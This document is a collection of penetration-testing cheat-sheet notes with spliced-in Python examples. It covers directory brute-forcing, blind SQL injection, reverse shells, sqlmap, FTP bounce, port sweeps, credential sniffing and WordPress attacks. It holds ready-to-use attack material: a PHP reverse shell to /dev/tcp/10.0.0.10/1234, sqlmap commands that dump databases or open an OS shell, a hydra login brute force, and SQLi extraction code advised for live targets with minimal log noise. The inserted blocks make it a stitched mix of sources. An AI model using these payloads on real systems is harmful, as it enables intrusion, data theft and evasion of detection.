-
Directory enumeration
Hints
General search:
nikto -host $victim
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
Through a SOCKS proxy (e.g. a pivot):
gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
-
Union-based injections
Blind SQL injections
If a statement produces no visible output, try a time-based approach.
Enumerating in INSERT statements
Assume the INSERT statement is
INSERT INTO $tablename (email,name) VALUES ("email", "name");
Then use a timing attack to determine whether a certain value is in a field:
INSERT INTO newsletter (name,email) VALUES ('name', ' ' AND…
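The time-based approach above, as an added example that is not part of the original notes: the payload builder assumes MySQL and that the injected value lands inside a single-quoted VALUES field, the table and column names are placeholders, and MockTarget stands in for the vulnerable endpoint so the extraction runs offline.

```python
import time
from typing import Callable

# Search space for each extracted character: printable ASCII.
LOW, HIGH = 32, 126


def insert_payload(pos: int, threshold: int, delay: int = 3,
                   subquery: str = "SELECT email FROM newsletter LIMIT 1") -> str:
    """Value to place in the injectable single-quoted VALUES field.

    Assumptions (not from the page): MySQL, and the value sits inside a
    quoted string literal. The literal is closed, a conditional SLEEP is
    attached with string arithmetic (MySQL casts '' + (expr) to a number,
    so the INSERT still parses), and the literal is reopened. The row that
    gets inserted is garbage; only the delay carries information.
    """
    return (f"'+(SELECT IF(ORD(SUBSTRING(({subquery}),{pos},1))>{threshold},"
            f"SLEEP({delay}),0))+'")


def timed_oracle(send: Callable[[str], None], payload: str, delay: float) -> bool:
    """True when the request took at least `delay` seconds, i.e. the injected
    condition held and SLEEP() fired. Choose `delay` well above the normal
    latency jitter: one false positive corrupts one extracted character."""
    start = time.monotonic()
    send(payload)
    return time.monotonic() - start >= delay


def sleeping_sender(seconds: float) -> Callable[[str], None]:
    """Fake transport that only sleeps, to exercise timed_oracle offline."""
    return lambda _payload: time.sleep(seconds)


def extract(is_greater: Callable[[int, int], bool], length: int) -> str:
    """Recover `length` characters with a binary search per position.

    is_greater(pos, threshold) answers "is ORD(char at pos) > threshold?";
    against a real target it wraps timed_oracle(send, insert_payload(pos,
    threshold), delay). At most 7 queries per character instead of up to 95
    with a linear scan. Positions past the end of the value decode to
    chr(LOW); if the length is unknown, find it first with the same oracle
    on LENGTH(...).
    """
    out = []
    for pos in range(1, length + 1):
        lo, hi = LOW, HIGH
        while lo < hi:
            mid = (lo + hi) // 2
            if is_greater(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


class MockTarget:
    """Offline stand-in for the vulnerable endpoint (constructed for this
    example). It answers the comparison the payload would make, without the
    network round trip, and counts how many queries it was asked."""

    def __init__(self, secret: str):
        self.secret = secret
        self.queries = 0

    def is_greater(self, pos: int, threshold: int) -> bool:
        self.queries += 1
        return pos <= len(self.secret) and ord(self.secret[pos - 1]) > threshold


if __name__ == "__main__":
    target = MockTarget("alice@example.com")
    print(insert_payload(1, 96))
    print(extract(target.is_greater, 17), target.queries, "queries")
```

Against a live target, replace MockTarget with a function that sends the payload in the real request and wraps it in timed_oracle; the binary search keeps the number of slow requests, and therefore the noise in the logs, small.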
-
See a packet in its context
Context menu, choose Follow.
Show only ICMP packets from a host
tcpdump host 10.11.1.128 and icmp -i tun0
Show other systems communicating with addresses outside our own range (display filter)
ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && !dns && !browser && !ssdp && !nbns && !llmnr
Record audio
Wireshark can transform captured audio…
-
Name confusion
Serve a file:
echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000
Request a file over SSL:
echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443
Return the output of a program:
ncat -l localhost 3000 --exec /bin/date
Transfer a file directly (unencrypted!):
1. Receiver: user@host02:~$ ncat -l > aha or nc -nlvp 4444…
-
IF THE METERPRETER SHELL HANGS, TRY PRESSING ENTER SEVERAL TIMES ON THE VICTIM.
Setting up
Listen on a system that the target can reach, e.g. with nc -lnvp 9998 [l=listen, v=verbose, p=port, n=no name resolution]. Then initiate the connection from the target system; the address and port in the payload must match the listener. Here is an example directly in PHP:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
Another example, e.g. directly in a console…
-
Standard case:
$ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e
More aggressive, dump the DB:
sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5
sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables
Get a shell:
sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell
Use an existing HTTP request as template, e.g. store a request in a text file:
POST /index.php HTTP/1.1
Header: value
...
Then run sqlmap with this file request.txt:
sqlmap -r…
-
Note that FTP directory listings do not show hidden files! On Windows try e.g. "cd ProgramData" anyway.
Enumeration
With nmap. Scan a network for FTP servers that allow anonymous access:
nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254
FTP relays
The FTP specification defines server-to-server transfers: one FTP server can be instructed to send files to another, third-party server (the address given with the PORT command does not have to be the client's own).…
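The relay mechanism described above, as an added example that is not part of the original notes: the PORT argument encoding from RFC 959, the command sequences for a server-to-server transfer and for the classic bounce, and the server-side check that rejects it. Host addresses, file names and the PASV reply are constructed for the example.

```python
import ipaddress
import re

PASV_RE = re.compile(r"\((\d{1,3}(?:,\d{1,3}){5})\)")


def port_argument(host: str, port: int) -> str:
    """Encode host and port as the h1,h2,h3,h4,p1,p2 argument of the PORT
    command (RFC 959): the port is split into its high and low byte."""
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    octets = ipaddress.IPv4Address(host).packed
    return ",".join(str(b) for b in octets) + f",{port >> 8},{port & 0xFF}"


def parse_port_argument(arg: str) -> tuple[str, int]:
    """Inverse of port_argument; also decodes the tuple inside a 227 PASV reply."""
    parts = [int(p) for p in arg.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"malformed PORT argument: {arg}")
    return ".".join(str(p) for p in parts[:4]), parts[4] * 256 + parts[5]


def parse_pasv_reply(reply: str) -> tuple[str, int]:
    """Extract (host, port) from '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)'."""
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError(f"not a PASV reply: {reply!r}")
    return parse_port_argument(m.group(1))


def fxp_commands(pasv_reply_from_a: str, filename: str) -> dict[str, list[str]]:
    """Server-to-server relay: server A opens a passive data port, server B is
    told with PORT to connect to it; A then sends the file and B stores it.
    Both control connections stay with the client; the data flows A -> B."""
    host, port = parse_pasv_reply(pasv_reply_from_a)
    return {
        "server_a": [f"RETR {filename}"],
        "server_b": [f"PORT {port_argument(host, port)}", f"STOR {filename}"],
    }


def bounce_commands(third_party: str, third_port: int, filename: str) -> list[str]:
    """The classic bounce: after anonymous login, PORT points the data
    connection at an arbitrary third party and RETR makes the FTP server
    deliver a previously uploaded file there, e.g. to port 25."""
    return ["USER anonymous", "PASS anonymous@",
            f"PORT {port_argument(third_party, third_port)}", f"RETR {filename}"]


def is_bounce_attempt(port_arg: str, control_peer: str) -> bool:
    """Server-side check that defeats the attack: a PORT whose host differs
    from the address of the control connection is refused."""
    host, _ = parse_port_argument(port_arg)
    return ipaddress.IPv4Address(host) != ipaddress.IPv4Address(control_peer)


if __name__ == "__main__":
    print(fxp_commands("227 Entering Passive Mode (10,11,1,5,195,80).", "backup.tar"))
    print(bounce_commands("10.11.1.20", 25, "mail.txt"))
    print(is_bounce_attempt("10,11,1,20,0,25", "192.168.119.5"))
```

Most current FTP daemons apply exactly the is_bounce_attempt check (and often refuse data connections to privileged ports), so a relay that works is itself a finding worth reporting.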
-
General notes
NC / Netcat
Try netcat first on interesting ports or narrow port ranges; it is quieter than a full scanner.
Network scan
Choose a port that is probably open on the systems of this network, e.g. 445 for Windows hosts or 22 for Linux hosts.
for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…
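The same single-port sweep as the nc loop above, as an added example that is not part of the original notes: a parallel TCP connect probe with a timeout, plus a local listener so the behaviour can be checked offline. The network 10.10.10.0/24 and port 445 are the page's own placeholders, nothing here is a real target.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Iterable


def tcp_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Full TCP connect, like nc -z: True on a completed handshake, False on
    refusal or timeout. Noisier than a SYN scan but needs no privileges."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def hosts_in(cidr: str) -> list[str]:
    """Usable host addresses of a network, e.g. 10.10.10.0/24 -> .1 .. .254."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


def sweep(hosts: Iterable[str], port: int, timeout: float = 1.0,
          workers: int = 64) -> list[str]:
    """Probe one port on many hosts in parallel; returns the hosts that answered.
    `workers` bounds the concurrency so a pivot host is not flooded."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: (h, tcp_open(h, port, timeout)), hosts))
    return [h for h, ok in results if ok]


def open_listener() -> tuple[socket.socket, int]:
    """Local listening socket on a free port, used to demonstrate the sweep offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = open_listener()
    print("open on 127.0.0.1:", sweep(["127.0.0.1"], port, timeout=0.5))
    srv.close()
    print("after closing the listener:", sweep(["127.0.0.1"], port, timeout=0.5))
    # Real use: sweep(hosts_in("10.10.10.0/24"), 445)
```

A refused connection returns immediately, so on a quiet /24 the run time is dominated by filtered hosts; keep the timeout short, as the nc -w 1 in the loop above does.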
-
Linux
Detect IPv6 hosts
IPv6 uses Neighbour Discovery instead of ARP, so there is no ARP table as in Ethernet/IPv4. We can fill the neighbour cache the same way, though, to list all neighbours / directly reachable hosts: ping the all-nodes multicast address, then read the cache.
ping6 -c 5 ff02::1%eth0 >/dev/null
ip -6 neigh
Bonus: ip neigh (or ip -4 neigh) shows the IPv4 address resolution table like the arp command does.
Detect IPv6 addresses for known IPv4 addresses
Scenario:…
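As an added example that is not part of the original notes: a parser for the `ip neigh` output of both address families and an EUI-64 derivation, combined into the lookup a practitioner would do for the truncated scenario above (link the IPv4 and IPv6 neighbour caches through the MAC address). The cache contents are constructed for the example, and the approach is mine, not the page's.

```python
import ipaddress
import re

# Constructed sample output of `ip -4 neigh` and `ip -6 neigh` (not a real capture).
SAMPLE_V4 = """\
10.11.1.128 dev eth0 lladdr 08:00:27:ab:cd:ef REACHABLE
10.11.1.1 dev eth0 lladdr 00:11:22:33:44:55 STALE
"""
SAMPLE_V6 = """\
fe80::1 dev eth0 lladdr 00:11:22:33:44:55 router REACHABLE
2001:db8::10 dev eth0 lladdr 08:00:27:ab:cd:ef STALE
fe80::a00:27ff:feab:cdef dev eth0 lladdr 08:00:27:ab:cd:ef REACHABLE
fe80::2 dev eth0  FAILED
"""

# addr, interface, optional lladdr, any flags (e.g. "router"), NUD state at the end.
NEIGH_RE = re.compile(
    r"^(?P<addr>\S+) dev (?P<dev>\S+)(?: lladdr (?P<lladdr>\S+))?.*?\s(?P<state>[A-Z]+)$"
)


def parse_neigh(text: str) -> list[dict]:
    """Turn `ip neigh` lines into dicts; lladdr is None for FAILED/INCOMPLETE
    entries. `ip` prints addresses compressed and lowercase, so they can be
    compared as strings."""
    out = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lladdr"] = d["lladdr"].lower() if d["lladdr"] else None
            out.append(d)
    return out


def link_local_from_mac(mac: str) -> str:
    """EUI-64 link-local address (fe80::/64) derived from a MAC: flip the
    universal/local bit of the first octet and insert ff:fe in the middle.
    Only hosts that use EUI-64 interface IDs have this address; hosts with
    privacy or randomised IIDs will not."""
    octets = bytearray(int(x, 16) for x in mac.split(":"))
    if len(octets) != 6:
        raise ValueError(f"not a MAC address: {mac}")
    octets[0] ^= 0x02
    iid = bytes(octets[:3]) + b"\xff\xfe" + bytes(octets[3:])
    return str(ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid))


def ipv6_for_ipv4(v4_text: str, v6_text: str, ipv4: str) -> list[str]:
    """Candidate IPv6 addresses of a host known by its IPv4 address: every
    IPv6 neighbour entry with the same MAC, plus the EUI-64 guess in case
    the host has not been seen on IPv6 yet. Sorted, without duplicates."""
    macs = {e["lladdr"] for e in parse_neigh(v4_text)
            if e["addr"] == ipv4 and e["lladdr"]}
    found = {e["addr"] for e in parse_neigh(v6_text) if e["lladdr"] in macs}
    found |= {link_local_from_mac(m) for m in macs}
    return sorted(found)


if __name__ == "__main__":
    for entry in parse_neigh(SAMPLE_V6):
        print(entry)
    print(ipv6_for_ipv4(SAMPLE_V4, SAMPLE_V6, "10.11.1.128"))
```

In practice feed the functions the real output of `ip -4 neigh` and `ip -6 neigh` after the multicast ping above; the EUI-64 guess is cheap to verify with a single ping6 to the derived address on the interface.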
-
See also the Wireshark post.
PSnuffle
Metasploit module; analyses live traffic for credentials of various protocols.
msf > use auxiliary/sniffer/psnuffle
PCredz
PCredz takes a PCAP file and extracts hashes and other credentials.
pcredz -f dump.pcap
Zeek
GitHub, zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you…
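What the sniffers above do for the simplest cleartext protocols, as an added example that is not part of the original notes: one pass over a reassembled TCP stream that pulls FTP USER/PASS pairs and HTTP Basic credentials. Both sample streams are constructed for the example; stream reassembly itself (tcpflow, Wireshark's Follow, or Zeek's logs) is assumed to have happened already.

```python
import base64
import re

# Constructed cleartext of two captured TCP streams (not a real capture).
SAMPLE_FTP = (
    "220 ProFTPD Server ready.\r\n"
    "USER alice\r\n"
    "331 Password required for alice\r\n"
    "PASS s3cret!\r\n"
    "230 User alice logged in\r\n"
)
SAMPLE_HTTP = (
    "GET /admin/ HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Authorization: Basic Ym9iOmh1bnRlcjI=\r\n"
    "\r\n"
)

FTP_USER_RE = re.compile(r"^USER (\S+)$", re.IGNORECASE)
FTP_PASS_RE = re.compile(r"^PASS (\S+)$", re.IGNORECASE)
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)$", re.IGNORECASE)


def extract_credentials(stream: str) -> list[dict]:
    """Scan one reassembled stream for cleartext logins.

    Handles FTP USER/PASS pairs (a PASS belongs to the last USER seen, so a
    stray PASS without USER is ignored) and HTTP Basic headers (base64 of
    user:password; malformed base64 is skipped). Hash-based schemes such as
    NTLM or Digest are out of scope here; that is what PCredz adds.
    """
    creds, pending_user = [], None
    for raw in stream.splitlines():
        line = raw.strip()
        if m := FTP_USER_RE.match(line):
            pending_user = m.group(1)
        elif (m := FTP_PASS_RE.match(line)) and pending_user is not None:
            creds.append({"proto": "ftp", "user": pending_user, "password": m.group(1)})
            pending_user = None
        elif m := BASIC_RE.match(line):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError
                continue
            user, _, pw = decoded.partition(":")
            creds.append({"proto": "http-basic", "user": user, "password": pw})
    return creds


if __name__ == "__main__":
    print(extract_credentials(SAMPLE_FTP))
    print(extract_credentials(SAMPLE_HTTP))
```

The FTP branch keys on the client-to-server direction only; when both directions are merged into one stream, as Follow TCP Stream does, the numeric server replies never match the USER/PASS patterns, so merged input is fine.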
-
Sniffing and live content filtering.
Operation modes:
Unified: sniffs all packets on one interface. Packets addressed to the attacking host end here; all others are forwarded immediately after being received.
Bridged: forwards traffic from one interface to another. Practically undetectable, because the attacking host sits physically inline on the cable and has no presence of its own on the network.
Usage
ettercap OPTIONS TARGET1 TARGET2
Targets are defined as MAC/IPv4s/IPv6s/PORT…
-
Distributed port scanning. Install dnmap_client on many machines and one dnmap_server. The server controls the clients and splits the port scans between them. http://tools.kali.org/information-gathering/dnmap
-
Active Information Gathering tool. See http://tools.kali.org/information-gathering/dmitry
-
Analyses SSL/TLS configuration. https://github.com/nabla-c0d3/sslyze
python -m sslyze --regular URL
(Current sslyze releases run the regular scan set by default; check python -m sslyze --help for whether --regular is still accepted.)
-
Enumeration
wpscan (GitHub):
wpscan --url $target
An API token can be useful; with it, the WordPress Vulnerability Database is queried for the detected versions.
Login brute force
hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Check users (author ID enumeration; WordPress redirects to the author's slug):
http://spectra.htb/main/?author=1
http://spectra.htb/main/?author=2
…
Most beautiful WordPress plugin
XSS injection
If there is a way to inject code somewhere (e.g. via a plugin)…
-
Web server scanner
./nikto.pl -host <IP> scans a host and creates a report with details and possible vulnerabilities.
Interesting parameters:
-evasion [12345678AB] (see options)
-mutate (see options)
-Pause
-Save
-T (see options)